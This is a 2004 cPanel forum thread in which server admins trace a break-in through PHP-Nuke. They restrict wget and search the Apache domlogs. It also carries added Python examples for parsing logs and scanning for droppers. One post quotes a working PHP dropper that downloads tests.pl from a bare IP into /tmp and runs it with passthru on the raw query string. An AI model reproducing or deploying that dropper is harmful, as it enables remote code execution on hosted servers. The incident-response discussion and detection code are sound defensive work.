
hack!

Discussion in 'General Discussion' started by ehsan, Jun 1, 2004.

  1. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    One of our boxes has been hacked.

    I can't find how they got in; I saw a funny script called tests.pl in /tmp and deleted it.

    my guess is they are using FTP...

    I found this in /var/log/secure

    Jun 2 00:42:17 server1 Cp-Wrap[14968]: Pushing "32192 LIST 0 0" to '/usr/local/cpanel/bin/ftpadmin' for UID: 32192

    Does anyone have an explanation for this? What is this, what is Cp-Wrap, is it a cPanel method?


    I have the APF firewall installed on Red Hat 8.0 with the newest Apache and cPanel.

    (IM me with a price for catching the hole and hacker)

    Thanks!
     
  2. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    Probably through a PHP script on the server; the tmp directory is easy to hack through PHP.

    If you have a Nuke installed on the server, you can bet that's it.
     
  3. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    I have Nuke installed on many domains. There is a script called tests.pl that keeps coming back to /tmp; is it a safe script? It is owned by nobody!

    It has to be done through a script; no login to the server is shown in the log, and the index.html file added by the hacker is owned by the website owner.

    Would you please give me a tip on how I can track down which domain with Nuke is doing this...

    Thank you all
     
  4. [Q3]

    [Q3] Member

    Joined:
    Apr 8, 2003
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    I had a customer who had the same problem with his MyeGallery in PHPNuke. You can disable the PHPEXEC function, but your customers may have problems with their scripts.

    regards,

    Franco
     
  5. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    Caught the hacker! I'll see his ass in court soon :)
     
    #5 ehsan, Jun 2, 2004
    Last edited: Jun 2, 2004
  6. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    You caught him? Sweet. I was just gonna say a search from PuTTY should help, but without phpsuexec it's almost impossible to find who dropped the file in your /tmp directory.

    I would just put a burning poop bag on his front porch and call the fbi. You can't do much but they can ;)
     
  7. ehsan

    ehsan Well-Known Member

    Joined:
    Dec 11, 2001
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    16
    A simple grep "some text" /usr/local/apache/domlogs/* -r helped ;)

    I knew it was a script doing this, and the script was pushing "some text" with a query :) Simple to catch, but once you get hacked you kind of rush into everything...
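The domlog search described above, as an added example (not code from the thread): it parses Apache combined-log lines from per-domain logs, URL-decodes each query string, and reports which domain, client IP, script and user agent carried the marker text. The log lines, domains, IPs and paths are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample of Apache combined-log lines, keyed by the domain whose
# domlog they came from (on cPanel: /usr/local/apache/domlogs/<domain>).
# The IPs, domains, paths and user agents are made up for this example.
DOMLOGS = {
    "example-a.com": [
        '10.0.0.5 - - [02/Jun/2004:00:41:59 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
        '10.0.0.9 - - [02/Jun/2004:00:42:10 +0000] "GET /modules/gallery/view.php?msg=some+text HTTP/1.1" 200 77 "-" "libwww-perl/5.65"',
    ],
    "example-b.com": [
        '10.0.0.7 - - [02/Jun/2004:00:43:02 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    ],
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Split one combined-log line into fields; the query string is URL-decoded
    so that a marker like "some text" matches however it was encoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["uri"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query)
    return rec

def find_marker(domlogs, marker):
    """Return {domain: [(ip, path, decoded query, user agent), ...]} for every
    request whose path or query string carries the marker text."""
    hits = defaultdict(list)
    for domain, lines in domlogs.items():
        for line in lines:
            rec = parse_line(line)
            if rec and (marker in rec["path"] or marker in rec["query"]):
                hits[domain].append((rec["ip"], rec["path"], rec["query"], rec["ua"]))
    return dict(hits)
```

On a live box, replace DOMLOGS with the contents of each file under the domlogs directory; the domain key then tells you which account's script to inspect.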
     
  8. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    hackers should be burned at the stake... I'm serious. Okay, that's a little extreme. I would settle for sticking a red hot poker up their ass.:mad:
     
  9. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    :D funny
     
  10. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
  11. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    That's genius: "I hope with chmod 0 *wget*"

    I can't believe I never thought of that; just turn it back on when you need it.

    Sorry but the simple things amaze me sometimes...


    Where is wget located? If you know off hand.
     
  12. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
    I don't understand if your answer is ironic...

    When I want to use wget I turn it on.

    With chmod 0 you can't upload as
    nobody
    root
    other user

    cd /usr/bin
    chmod 700 wget*

    (I HOPE it works fine again, hh)
     
    #12 Creazioni1, Jun 3, 2004
    Last edited: Jun 3, 2004
  13. DWHS.net

    DWHS.net Well-Known Member
    PartnerNOC

    Joined:
    Jul 28, 2002
    Messages:
    1,569
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    LA, Costa RIca
    cPanel Access Level:
    Root Administrator
    Hmmm

    So wget is needed for some programs?

    I thought it was for the command line; I wonder if anything in cPanel needs it? Like the update etc.
     
  14. WCW Fan

    WCW Fan Well-Known Member

    Joined:
    Sep 22, 2003
    Messages:
    68
    Likes Received:
    0
    Trophy Points:
    6
    It's better to allow it only to root; that will make it so it won't break cPanel's update.

    chmod 700 /usr/bin/wget

    Might also want to look into securing GET.
     
  15. Creazioni1

    Creazioni1 Well-Known Member

    Joined:
    Dec 28, 2003
    Messages:
    58
    Likes Received:
    0
    Trophy Points:
    6
    test.pl

    http://www.a-squad.com/ASQUAD.htm

    http://www.a-squad.com/audit/

    <?php
    // Drop-and-run: writes a Perl script into /tmp, then executes it with
    // whatever arrived in the URL query string.
    $tester = "/tmp/tests.pl";
    if (!file_exists($tester)) {
        $testw = fopen($tester, "w");
        // Sends the path of this PHP file as the User-Agent, so the remote
        // host can log which site ran it.
        ini_set('user_agent', __FILE__);
        // Fetches the payload over HTTP from a bare IP and copies it into /tmp.
        $testr = fopen("http://206.71.87.80/tests.pl", "r");
        while ($s = fread($testr, 1024)) { fwrite($testw, $s); }
        fclose($testw);
        fclose($testr);
    }
    // $QUERY_STRING only exists as a plain variable with register_globals on.
    passthru("perl $tester '$QUERY_STRING' 2>&1");
    ?>

    !!!!!!!!!!!!!!
    I DON'T understand if this is a cracker site or not
     
  16. rs-freddo

    rs-freddo Well-Known Member

    Joined:
    May 13, 2003
    Messages:
    832
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I believe this mob did make a file available to "test security"; part of what the file did was to download a file into tmp. I know a lot of cPanel users ran this file. I'm not sure what the total extent of its purpose was - I certainly wouldn't install anything that used wget to fetch a file from an IP.

    Make sure one of your resellers or users is not doing the "security testing". There is a thread on these forums.
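For the PHP snippet posted above and rs-freddo's point that it downloads a file into tmp and runs it, here is an added example (not from the thread or from a-squad) of a source scanner that flags that drop-and-run pattern in PHP files: a remote HTTP fetch, a /tmp path, a shell-out, a spoofed user agent, and the query string reaching the shell. The two PHP samples are constructed; the IP in the sample is a documentation address.

```python
import re

# Indicator patterns for the download-to-/tmp-and-execute pattern shown in
# the thread. Each maps an indicator name to a regex over PHP source.
INDICATORS = {
    "remote_fetch": re.compile(r'\b(?:fopen|file_get_contents|curl_init)\s*\(\s*["\']https?://', re.I),
    "tmp_path": re.compile(r'["\']/tmp/[^"\']+["\']'),
    "shell_exec": re.compile(r'\b(?:passthru|system|exec|shell_exec|popen|proc_open)\s*\(', re.I),
    "ua_spoof": re.compile(r'ini_set\s*\(\s*["\']user_agent["\']', re.I),
    # a shell-out whose argument carries request data (register_globals or superglobal)
    "query_to_shell": re.compile(r'\b(?:passthru|system|exec|shell_exec|popen)\s*\([^;]*\$(?:QUERY_STRING|_GET|_REQUEST|_POST)', re.I),
}

# Constructed sample mirroring the dropper in the thread (IP replaced with a
# TEST-NET address) and a harmless gallery snippet for comparison.
DROPPER = r'''<?php
$t = "/tmp/tests.pl";
if (!file_exists($t)) {
  $w = fopen($t, "w");
  ini_set('user_agent', __FILE__);
  $r = fopen("http://203.0.113.10/tests.pl", "r");
  while ($s = fread($r, 1024)) { fwrite($w, $s); }
  fclose($w); fclose($r);
}
passthru("perl $t '$QUERY_STRING' 2>&1");
?>'''

BENIGN = r'''<?php
$caption = file_get_contents("captions/" . basename($_GET["img"]) . ".txt");
echo htmlspecialchars($caption);
?>'''

def scan_php(src):
    """Return the set of indicator names present in one PHP source string."""
    return {name for name, rx in INDICATORS.items() if rx.search(src)}

def is_dropper(src):
    """A file that fetches remote content and also shells out is treated as a
    dropper; a /tmp path or spoofed user agent on its own is only suspicious."""
    found = scan_php(src)
    return "remote_fetch" in found and "shell_exec" in found
```

Run scan_php over every .php file under the account document roots to list which Nuke module is carrying the pattern.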
     